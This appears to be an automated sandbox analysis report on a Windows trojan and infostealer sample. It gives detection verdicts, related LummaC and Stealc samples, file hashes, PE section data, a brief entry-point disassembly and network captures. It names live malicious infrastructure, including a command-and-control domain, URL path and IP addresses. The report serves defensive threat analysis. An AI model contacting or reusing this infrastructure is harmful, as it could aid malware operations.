                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:FIyDwZM4OR.exe
                                    renamed because original name is a hash value
                                    Original Sample Name:81faa857e0e440955735ed78a8c61ddd.exe
                                    Detection:MAL
                                    Classification:mal100.troj.spyw.evad.winEXE@1/0@6/2
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HCA Information:Failed
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Stop behavior analysis, all processes terminated
                                    • Exclude process from analysis (whitelisted): SIHClient.exe
                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ocsp.edge.digicert.com, ctldl.windowsupdate.com
                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
04:00:20 | API Interceptor | 3x Sleep call for process: FIyDwZM4OR.exe modified
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    81.29.149.125ZFttiy4Tt8.exeGet hashmaliciousUnknownBrowse
                                    • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                    e62iSl0abZ.exeGet hashmaliciousUnknownBrowse
                                    • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                    HGFSqmKwd5.exeGet hashmaliciousUnknownBrowse
                                    • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                    A3nofpjN9A.exeGet hashmaliciousUnknownBrowse
                                    • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                    QMtCX5RLOP.exeGet hashmaliciousUnknownBrowse
                                    • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                    s8kPMNXOZY.exeGet hashmaliciousUnknownBrowse
                                    • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                    GjZewfxHTi.exeGet hashmaliciousUnknownBrowse
                                    • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                    sYPORwmgwQ.exeGet hashmaliciousUnknownBrowse
                                    • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                    xdeRtWCeNH.exeGet hashmaliciousUnknownBrowse
                                    • home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
                                    3.218.7.103ZFttiy4Tt8.exeGet hashmaliciousUnknownBrowse
                                      e62iSl0abZ.exeGet hashmaliciousUnknownBrowse
                                        A3nofpjN9A.exeGet hashmaliciousUnknownBrowse
                                          j2nLC29vCy.exeGet hashmaliciousLummaCBrowse
                                            vUcZzNWkKc.exeGet hashmaliciousLummaCBrowse
                                              GjZewfxHTi.exeGet hashmaliciousUnknownBrowse
                                                xdeRtWCeNH.exeGet hashmaliciousUnknownBrowse
                                                  E205fJJS1Q.exeGet hashmaliciousLummaCBrowse
                                                    w22319us3M.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                      QzK1LCSuq2.exeGet hashmaliciousLummaCBrowse
                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        httpbin.orgZFttiy4Tt8.exeGet hashmaliciousUnknownBrowse
                                                        • 3.218.7.103
                                                        e62iSl0abZ.exeGet hashmaliciousUnknownBrowse
                                                        • 3.218.7.103
                                                        HGFSqmKwd5.exeGet hashmaliciousUnknownBrowse
                                                        • 34.226.108.155
                                                        A3nofpjN9A.exeGet hashmaliciousUnknownBrowse
                                                        • 3.218.7.103
                                                        QMtCX5RLOP.exeGet hashmaliciousUnknownBrowse
                                                        • 34.226.108.155
                                                        j2nLC29vCy.exeGet hashmaliciousLummaCBrowse
                                                        • 3.218.7.103
                                                        es5qBEFupj.exeGet hashmaliciousLummaCBrowse
                                                        • 34.226.108.155
                                                        s8kPMNXOZY.exeGet hashmaliciousUnknownBrowse
                                                        • 34.226.108.155
                                                        vUcZzNWkKc.exeGet hashmaliciousLummaCBrowse
                                                        • 3.218.7.103
                                                        GjZewfxHTi.exeGet hashmaliciousUnknownBrowse
                                                        • 3.218.7.103
                                                        fp2e7a.wpc.phicdn.netZFttiy4Tt8.exeGet hashmaliciousUnknownBrowse
                                                        • 192.229.221.95
                                                        rpDOUhuBC5.exeGet hashmaliciousCredential FlusherBrowse
                                                        • 192.229.221.95
                                                        http://volmar.sinformations.cfdGet hashmaliciousUnknownBrowse
                                                        • 192.229.221.95
                                                        OTRykEzo6o.exeGet hashmaliciousUnknownBrowse
                                                        • 192.229.221.95
                                                        ctfmon.exeGet hashmaliciousUnknownBrowse
                                                        • 192.229.221.95
                                                        wce.exeGet hashmaliciousUnknownBrowse
                                                        • 192.229.221.95
                                                        atw3.dllGet hashmaliciousGozi, UrsnifBrowse
                                                        • 192.229.221.95
                                                        setup.msiGet hashmaliciousUnknownBrowse
                                                        • 192.229.221.95
                                                        ERTL09tA59.exeGet hashmaliciousLummaCBrowse
                                                        • 192.229.221.95
                                                        vJPhYDClT5.exeGet hashmaliciousUnknownBrowse
                                                        • 192.229.221.95
                                                        home.fiveth5ht.topZFttiy4Tt8.exeGet hashmaliciousUnknownBrowse
                                                        • 81.29.149.125
                                                        e62iSl0abZ.exeGet hashmaliciousUnknownBrowse
                                                        • 81.29.149.125
                                                        HGFSqmKwd5.exeGet hashmaliciousUnknownBrowse
                                                        • 81.29.149.125
                                                        A3nofpjN9A.exeGet hashmaliciousUnknownBrowse
                                                        • 81.29.149.125
                                                        QMtCX5RLOP.exeGet hashmaliciousUnknownBrowse
                                                        • 81.29.149.125
                                                        s8kPMNXOZY.exeGet hashmaliciousUnknownBrowse
                                                        • 81.29.149.125
                                                        GjZewfxHTi.exeGet hashmaliciousUnknownBrowse
                                                        • 81.29.149.125
                                                        sYPORwmgwQ.exeGet hashmaliciousUnknownBrowse
                                                        • 81.29.149.125
                                                        xdeRtWCeNH.exeGet hashmaliciousUnknownBrowse
                                                        • 81.29.149.125
                                                        f7qbEfJl0B.exeGet hashmaliciousUnknownBrowse
                                                        • 5.101.3.217
Match                   Associated Sample Name / URL  Detection  Threat Name                                     Context
COMUNICA_IT_SERVICESCH  ZFttiy4Tt8.exe                malicious  Unknown                                         • 81.29.149.125
                        e62iSl0abZ.exe                malicious  Unknown                                         • 81.29.149.125
                        HGFSqmKwd5.exe                malicious  Unknown                                         • 81.29.149.125
                        A3nofpjN9A.exe                malicious  Unknown                                         • 81.29.149.125
                        QMtCX5RLOP.exe                malicious  Unknown                                         • 81.29.149.125
                        s8kPMNXOZY.exe                malicious  Unknown                                         • 81.29.149.125
                        GjZewfxHTi.exe                malicious  Unknown                                         • 81.29.149.125
                        sYPORwmgwQ.exe                malicious  Unknown                                         • 81.29.149.125
                        xdeRtWCeNH.exe                malicious  Unknown                                         • 81.29.149.125
                        file.exe                      malicious  LummaC, Amadey, LummaC Stealer, RHADAMANTHYS    • 81.29.149.45
AMAZON-AESUS            ZFttiy4Tt8.exe                malicious  Unknown                                         • 3.218.7.103
                        e62iSl0abZ.exe                malicious  Unknown                                         • 3.218.7.103
                        HGFSqmKwd5.exe                malicious  Unknown                                         • 34.226.108.155
                        A3nofpjN9A.exe                malicious  Unknown                                         • 3.218.7.103
                        QMtCX5RLOP.exe                malicious  Unknown                                         • 34.226.108.155
                        j2nLC29vCy.exe                malicious  LummaC                                          • 3.218.7.103
                        es5qBEFupj.exe                malicious  LummaC                                          • 34.226.108.155
                        s8kPMNXOZY.exe                malicious  Unknown                                         • 34.226.108.155
                        vUcZzNWkKc.exe                malicious  LummaC                                          • 3.218.7.103
                        GjZewfxHTi.exe                malicious  Unknown                                         • 3.218.7.103
                                                        No context
                                                        No context
                                                        No created / dropped files found
File type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit): 7.985419919572845
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• VXD Driver (31/22) 0.00%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: FIyDwZM4OR.exe
File size: 4'464'128 bytes
MD5: 81faa857e0e440955735ed78a8c61ddd
SHA1: c13ce342d65ff323711b7a8829bcc3f94a3cfe56
SHA256: 0db9a16d15b04d332d6f96fea01b0c31662105d3097f340ed124c7357a964072
SHA512: 3daacf7ea9b6160568f0d285898c56921f588a226e5055b803c74533218bde2b9f102facba3e6fd2d47241b9b5edcdb11e2df29daa7307503092c7be161362c9
SSDEEP: 98304:j6o0e+zdDWFs1wNzJH9K5/ig4mCRqItKHT64yFyeYm5t7g/Htn:j6o0e+z84wVJHs5/x41cW4yEeP5ta
TLSH: 7A2633951D85E128F604533C8BF32D25790352EF157F12F2B86623BA9693F21EE82DB1
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._.lg...............(..I...p..2........... I...@.................................f.D...@... ............................
Icon Hash: 90cececece8e8eb0
Entrypoint: 0x101e000
Entrypoint Section: .taggant
Digitally signed: true
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics: DYNAMIC_BASE
Time Stamp: 0x676CDB5F [Thu Dec 26 04:28:15 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b
Signature Valid:
Signature Issuer:
Signature Validation Error:
Error Number:
                                                        Not Before, Not After
                                                          Subject Chain
                                                            Version:
                                                            Thumbprint MD5:
                                                            Thumbprint SHA-1:
                                                            Thumbprint SHA-256:
                                                            Serial:
                                                            Instruction
                                                            jmp 00007FEA751C418Ah
                                                            paddb mm0, qword ptr [ebx+00h]
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            jmp 00007FEA751C6185h
                                                            add byte ptr [ebx], al
                                                            or al, byte ptr [eax]
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], dl
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [edx], al
                                                            or al, byte ptr [eax]
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax+eax*4], cl
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            adc byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            push es
                                                            or al, byte ptr [eax]
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], dh
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], ch
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], cl
                                                            add byte ptr [eax], 00000000h
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            adc byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add ecx, dword ptr [edx]
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            xor byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            or byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            and al, byte ptr [eax]
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            or al, 80h
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            adc byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add ecx, dword ptr [edx]
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            xor byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            sub byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add dword ptr [eax+00000000h], eax
                                                            add byte ptr [eax], al
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x6dd05f         0x73          .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x6dc000         0x1ac         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x708a00         0x688
IMAGE_DIRECTORY_ENTRY_BASERELOC       0xc1c5a0         0x10          eqinbttk
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0xc1c550         0x18          eqinbttk
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x0              0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name      Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type             Entropy             Characteristics
          0x1000           0x6db000      0x288a00  4cb7485190f9818c2efa2adc51c07a6c  unknown   unknown             unknown               unknown             IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc     0x6dc000         0x1ac         0x200     b85e7f220becbcd4fffb552fdbce6cf8  False     0.583984375         data                  4.570405267547769   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata    0x6dd000         0x1000        0x200     6363462e4ea156e03144265f6be7871e  False     0.166015625         data                  1.1763897754724144  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          0x6de000         0x389000      0x200     3f1a6ca03ba2d98e73b8d5dcf7bf187b  unknown   unknown             unknown               unknown             IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
eqinbttk  0xa67000         0x1b6000      0x1b5800  f510176fbca135ce792342c132ab354d  False     0.9943833705357142  data                  7.954236983875095   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
yeuqavua  0xc1d000         0x1000        0x400     cf59107e11c32b8c324cd3cf5340452e  False     0.7412109375        data                  5.879690211472583   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant  0xc1e000         0x3000        0x2200    324f0de1452d0ff460d71b04e503e791  False     0.0744485294117647  DOS executable (COM)  0.865119459782109   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name         RVA       Size   Type                                    Language  Country  ZLIB Complexity
RT_MANIFEST  0xc1c5b0  0x152  ASCII text, with CRLF line terminators                     0.6479289940828402
DLL           Import
kernel32.dll  lstrcpy
Timestamp                            Source Port  Dest Port  Source IP      Dest IP
Dec 28, 2024 10:00:15.311912060 CET  49730        443        192.168.2.4    3.218.7.103
Dec 28, 2024 10:00:15.311958075 CET  443          49730      3.218.7.103    192.168.2.4
Dec 28, 2024 10:00:15.312025070 CET  49730        443        192.168.2.4    3.218.7.103
Dec 28, 2024 10:00:15.324445009 CET  49730        443        192.168.2.4    3.218.7.103
Dec 28, 2024 10:00:15.324475050 CET  443          49730      3.218.7.103    192.168.2.4
Dec 28, 2024 10:00:17.059369087 CET  443          49730      3.218.7.103    192.168.2.4
Dec 28, 2024 10:00:17.060002089 CET  49730        443        192.168.2.4    3.218.7.103
Dec 28, 2024 10:00:17.060026884 CET  443          49730      3.218.7.103    192.168.2.4
Dec 28, 2024 10:00:17.061203957 CET  443          49730      3.218.7.103    192.168.2.4
Dec 28, 2024 10:00:17.061269045 CET  49730        443        192.168.2.4    3.218.7.103
Dec 28, 2024 10:00:17.062648058 CET  49730        443        192.168.2.4    3.218.7.103
Dec 28, 2024 10:00:17.062711954 CET  443          49730      3.218.7.103    192.168.2.4
Dec 28, 2024 10:00:17.067631006 CET  49730        443        192.168.2.4    3.218.7.103
Dec 28, 2024 10:00:17.067637920 CET  443          49730      3.218.7.103    192.168.2.4
Dec 28, 2024 10:00:17.117203951 CET  49730        443        192.168.2.4    3.218.7.103
Dec 28, 2024 10:00:17.387429953 CET  443          49730      3.218.7.103    192.168.2.4
Dec 28, 2024 10:00:17.387667894 CET  443          49730      3.218.7.103    192.168.2.4
Dec 28, 2024 10:00:17.387741089 CET  49730        443        192.168.2.4    3.218.7.103
Dec 28, 2024 10:00:17.395596981 CET  49730        443        192.168.2.4    3.218.7.103
Dec 28, 2024 10:00:17.395613909 CET  443          49730      3.218.7.103    192.168.2.4
Dec 28, 2024 10:00:20.002249956 CET  49731        80         192.168.2.4    81.29.149.125
Dec 28, 2024 10:00:20.121721983 CET  80           49731      81.29.149.125  192.168.2.4
Dec 28, 2024 10:00:20.121874094 CET  49731        80         192.168.2.4    81.29.149.125
Dec 28, 2024 10:00:20.122982979 CET  49731        80         192.168.2.4    81.29.149.125
Dec 28, 2024 10:00:20.242659092 CET  80           49731      81.29.149.125  192.168.2.4
Dec 28, 2024 10:00:20.242676973 CET  80           49731      81.29.149.125  192.168.2.4
Dec 28, 2024 10:00:20.242692947 CET  80           49731      81.29.149.125  192.168.2.4
Dec 28, 2024 10:00:20.242703915 CET  80           49731      81.29.149.125  192.168.2.4
Dec 28, 2024 10:00:20.242733955 CET  80           49731      81.29.149.125  192.168.2.4
Dec 28, 2024 10:00:20.242813110 CET  80           49731      81.29.149.125  192.168.2.4
Dec 28, 2024 10:00:20.242822886 CET  80           49731      81.29.149.125  192.168.2.4
Dec 28, 2024 10:00:20.242842913 CET  49731        80         192.168.2.4    81.29.149.125
Dec 28, 2024 10:00:20.242857933 CET  80           49731      81.29.149.125  192.168.2.4
Dec 28, 2024 10:00:20.242896080 CET  49731        80         192.168.2.4    81.29.149.125
Dec 28, 2024 10:00:20.242927074 CET  80           49731      81.29.149.125  192.168.2.4
Dec 28, 2024 10:00:20.242939949 CET  80           49731      81.29.149.125  192.168.2.4
Dec 28, 2024 10:00:20.242973089 CET  49731        80         192.168.2.4    81.29.149.125
Dec 28, 2024 10:00:20.242984056 CET  49731        80         192.168.2.4    81.29.149.125
Dec 28, 2024 10:00:20.362961054 CET  80           49731      81.29.149.125  192.168.2.4
Dec 28, 2024 10:00:20.362977982 CET  80           49731      81.29.149.125  192.168.2.4
Dec 28, 2024 10:00:20.362991095 CET  80           49731      81.29.149.125  192.168.2.4
Dec 28, 2024 10:00:20.363023043 CET  80           49731      81.29.149.125  192.168.2.4
Dec 28, 2024 10:00:20.363053083 CET  49731        80         192.168.2.4    81.29.149.125
Dec 28, 2024 10:00:20.363116980 CET  49731        80         192.168.2.4    81.29.149.125
Dec 28, 2024 10:00:20.363149881 CET  80           49731      81.29.149.125  192.168.2.4
Dec 28, 2024 10:00:20.363183975 CET  80           49731      81.29.149.125  192.168.2.4
Dec 28, 2024 10:00:20.363193035 CET  49731        80         192.168.2.4    81.29.149.125
Dec 28, 2024 10:00:20.363228083 CET  49731        80         192.168.2.4    81.29.149.125
Dec 28, 2024 10:00:20.406266928 CET  80           49731      81.29.149.125  192.168.2.4
Dec 28, 2024 10:00:20.406461000 CET  49731        80         192.168.2.4    81.29.149.125
Dec 28, 2024 10:00:20.526102066 CET  80           49731      81.29.149.125  192.168.2.4
Dec 28, 2024 10:00:20.526231050 CET  49731        80         192.168.2.4    81.29.149.125
Dec 28, 2024 10:00:20.570242882 CET  80           49731      81.29.149.125  192.168.2.4
Dec 28, 2024 10:00:20.690066099 CET  80           49731      81.29.149.125  192.168.2.4
Dec 28, 2024 10:00:20.690164089 CET  49731        80         192.168.2.4    81.29.149.125
Dec 28, 2024 10:00:20.890202999 CET  80           49731      81.29.149.125  192.168.2.4
Dec 28, 2024 10:00:20.890436888 CET  49731        80         192.168.2.4    81.29.149.125
Dec 28, 2024 10:00:21.138317108 CET  80           49731      81.29.149.125  192.168.2.4
Dec 28, 2024 10:00:21.138444901 CET  49731        80         192.168.2.4    81.29.149.125
Dec 28, 2024 10:00:21.182323933 CET  80           49731      81.29.149.125  192.168.2.4
Dec 28, 2024 10:00:21.182502031 CET  49731        80         192.168.2.4    81.29.149.125
Dec 28, 2024 10:00:21.182590008 CET  49731        80         192.168.2.4    81.29.149.125
Dec 28, 2024 10:00:21.258466959 CET  80           49731      81.29.149.125  192.168.2.4
Dec 28, 2024 10:00:21.258543015 CET  49731        80         192.168.2.4    81.29.149.125
Dec 28, 2024 10:00:21.302141905 CET  80           49731      81.29.149.125  192.168.2.4
Dec 28, 2024 10:00:21.302165985 CET  80           49731      81.29.149.125  192.168.2.4
Dec 28, 2024 10:00:21.302212954 CET  49731        80         192.168.2.4    81.29.149.125
Dec 28, 2024 10:00:21.302249908 CET  80           49731      81.29.149.125  192.168.2.4
Dec 28, 2024 10:00:21.302261114 CET  80           49731      81.29.149.125  192.168.2.4
Dec 28, 2024 10:00:21.302297115 CET  49731        80         192.168.2.4    81.29.149.125
Dec 28, 2024 10:00:21.302323103 CET  49731        80         192.168.2.4    81.29.149.125
Dec 28, 2024 10:00:21.302337885 CET  80           49731      81.29.149.125  192.168.2.4
Dec 28, 2024 10:00:21.302356005 CET  80           49731      81.29.149.125  192.168.2.4
Dec 28, 2024 10:00:21.302386045 CET  49731        80         192.168.2.4    81.29.149.125
Dec 28, 2024 10:00:21.302498102 CET  80           49731      81.29.149.125  192.168.2.4
Dec 28, 2024 10:00:21.302510023 CET  80           49731      81.29.149.125  192.168.2.4
Dec 28, 2024 10:00:21.302537918 CET  49731        80         192.168.2.4    81.29.149.125
Dec 28, 2024 10:00:21.302555084 CET  49731        80         192.168.2.4    81.29.149.125
Dec 28, 2024 10:00:21.302576065 CET  80           49731      81.29.149.125  192.168.2.4
Dec 28, 2024 10:00:21.302614927 CET  80           49731      81.29.149.125  192.168.2.4
Dec 28, 2024 10:00:21.302623034 CET  49731        80         192.168.2.4    81.29.149.125
Dec 28, 2024 10:00:21.302645922 CET  80           49731      81.29.149.125  192.168.2.4
Dec 28, 2024 10:00:21.302664995 CET  49731        80         192.168.2.4    81.29.149.125
Dec 28, 2024 10:00:21.302683115 CET  49731        80         192.168.2.4    81.29.149.125
Dec 28, 2024 10:00:21.302769899 CET  80           49731      81.29.149.125  192.168.2.4
Dec 28, 2024 10:00:21.302820921 CET  49731        80         192.168.2.4    81.29.149.125
Dec 28, 2024 10:00:21.302839994 CET  80           49731      81.29.149.125  192.168.2.4
Dec 28, 2024 10:00:21.302886009 CET  49731        80         192.168.2.4    81.29.149.125
Dec 28, 2024 10:00:21.302894115 CET  80           49731      81.29.149.125  192.168.2.4
Dec 28, 2024 10:00:21.302946091 CET  49731        80         192.168.2.4    81.29.149.125
Dec 28, 2024 10:00:21.303029060 CET  80           49731      81.29.149.125  192.168.2.4
Dec 28, 2024 10:00:21.303100109 CET  80           49731      81.29.149.125  192.168.2.4
Dec 28, 2024 10:00:21.303184986 CET  80           49731      81.29.149.125  192.168.2.4
Dec 28, 2024 10:00:21.303278923 CET  80           49731      81.29.149.125  192.168.2.4
Dec 28, 2024 10:00:21.303329945 CET  80           49731      81.29.149.125  192.168.2.4
Dec 28, 2024 10:00:21.303405046 CET  80           49731      81.29.149.125  192.168.2.4
Dec 28, 2024 10:00:21.303453922 CET  80           49731      81.29.149.125  192.168.2.4
Dec 28, 2024 10:00:21.303553104 CET  80           49731      81.29.149.125  192.168.2.4
Dec 28, 2024 10:00:21.303591967 CET  80           49731      81.29.149.125  192.168.2.4
Dec 28, 2024 10:00:21.303668976 CET  80           49731      81.29.149.125  192.168.2.4
Dec 28, 2024 10:00:21.303792000 CET  80           49731      81.29.149.125  192.168.2.4
Dec 28, 2024 10:00:21.303802967 CET  80           49731      81.29.149.125  192.168.2.4
Dec 28, 2024 10:00:21.303847075 CET  80           49731      81.29.149.125  192.168.2.4
Dec 28, 2024 10:00:21.303915024 CET  80           49731      81.29.149.125  192.168.2.4
Dec 28, 2024 10:00:21.304009914 CET  80           49731      81.29.149.125  192.168.2.4
Dec 28, 2024 10:00:21.304069042 CET  80           49731      81.29.149.125  192.168.2.4
Dec 28, 2024 10:00:21.304291010 CET  80           49731      81.29.149.125  192.168.2.4
Dec 28, 2024 10:00:21.309331894 CET  49731        80         192.168.2.4    81.29.149.125
Dec 28, 2024 10:00:21.378348112 CET  80           49731      81.29.149.125  192.168.2.4
Dec 28, 2024 10:00:21.378442049 CET  49731        80         192.168.2.4    81.29.149.125
Dec 28, 2024 10:00:21.421860933 CET  80           49731      81.29.149.125  192.168.2.4
                                                            Dec 28, 2024 10:00:21.421952009 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.422060966 CET4973180192.168.2.481.29.149.125
                                                            Dec 28, 2024 10:00:21.422089100 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.422100067 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.422132969 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.422146082 CET4973180192.168.2.481.29.149.125
                                                            Dec 28, 2024 10:00:21.422235012 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.422293901 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.422382116 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.422430992 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.422517061 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.422612906 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.422704935 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.422735929 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.422784090 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.422827959 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.422873020 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.425085068 CET4973180192.168.2.481.29.149.125
                                                            Dec 28, 2024 10:00:21.429009914 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.429020882 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.429070950 CET4973180192.168.2.481.29.149.125
                                                            Dec 28, 2024 10:00:21.429104090 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.429114103 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.429162979 CET4973180192.168.2.481.29.149.125
                                                            Dec 28, 2024 10:00:21.429169893 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.429179907 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.429219961 CET4973180192.168.2.481.29.149.125
                                                            Dec 28, 2024 10:00:21.429222107 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.429249048 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.429276943 CET4973180192.168.2.481.29.149.125
                                                            Dec 28, 2024 10:00:21.429295063 CET4973180192.168.2.481.29.149.125
                                                            Dec 28, 2024 10:00:21.429348946 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.429369926 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.429378986 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.429394007 CET4973180192.168.2.481.29.149.125
                                                            Dec 28, 2024 10:00:21.429409027 CET4973180192.168.2.481.29.149.125
                                                            Dec 28, 2024 10:00:21.429420948 CET804973181.29.149.125192.168.2.4
                                                            Dec 28, 2024 10:00:21.429426908 CET4973180192.168.2.481.29.149.125
                                                            Dec 28, 2024 10:00:21.429472923 CET4973180192.168.2.481.29.149.125
                                                            Dec 28, 2024 10:00:21.429498911 CET804973181.29.149.125192.168.2.4
